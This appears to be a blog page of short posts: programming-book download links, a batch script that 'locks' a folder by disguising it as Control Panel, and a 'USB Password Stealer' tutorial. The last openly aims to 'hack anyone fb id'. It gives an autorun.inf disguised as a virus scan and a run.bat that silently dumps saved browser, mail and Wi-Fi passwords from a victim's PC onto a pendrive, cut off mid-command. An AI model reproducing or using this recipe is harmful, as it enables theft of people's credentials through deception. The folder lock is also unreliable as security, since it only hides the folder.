Programming Books ______________________________________________________________________________ Guys Here you got some books related to programming. Hope you enjoyed this ;-)..... 1. Let Us C Fifth Edition download link below, click and download it.. Let Us C Fifth Edition 2. Balguruswamy Object Oriented Programming With c++ Balguruswamy Object Oriented Programming 3. Graphics In C Language Graphics In C 4. Robert Lafore Object Oriented Programming With c++ Object Oriented c++ 5. CSS Cheat Code CSS Cheat Code 6. Graphics Programming Code in C Graphics In C
Folder Lock using cmd Yes! guys you can lock your private folders with help of cmd(command prompt) no need of third party software to lock your folder. To lock your private folders you have to follow these some simple steps. Step 1:- Copy and paste this all code into your notepad and enter your own password at the place of "YOUR_PASSWORD" in code. Now save it as .bat file in your directory. cls @ECHO OFF title Folder Locker if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK if NOT EXIST Locker goto MDLOCKER :CONFIRM echo Are you sure u want to Lock the folder(Y/N) set/p "cho=>" if %cho%==Y goto LOCK if %cho%==y goto LOCK if %cho%==n goto END if %cho%==N goto END echo Invalid choice. goto CONFIRM :LOCK ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" echo Folder locked goto End ...
USB Password Stealer Guys here i am going to share a trick to hack anyone fb id or anytype of password from this trick. Yes you can access anytype of user login id and password.So follow these simple steps to try this trick. Step 1:- Open this link http://www.nirsoft.net/password_recovery_tools.html and download some files. Files are Mail Pass View, IE Pass View, Password Fox, Chrome Pass, Web Browser Pass View, Wireless Key View, Download all these files. Step 2:- Now extract all these files in your pendrive. Step 3:- Now open your notepad and type or copy the following code and save it as autorun.inf in your pendrive. Code is following [autorun] open=run.bat ACTION= Scan your device for virus Step 4:- Now copy the following code in notepad and save this as run.bat in your pendrive. start ChromePass.exe /stext ChromePass.txt start mailpv.exe /stext mailpv.txt start WebBrowserPassView.exe / stext WebBrowserPassVie...
Comments
Post a Comment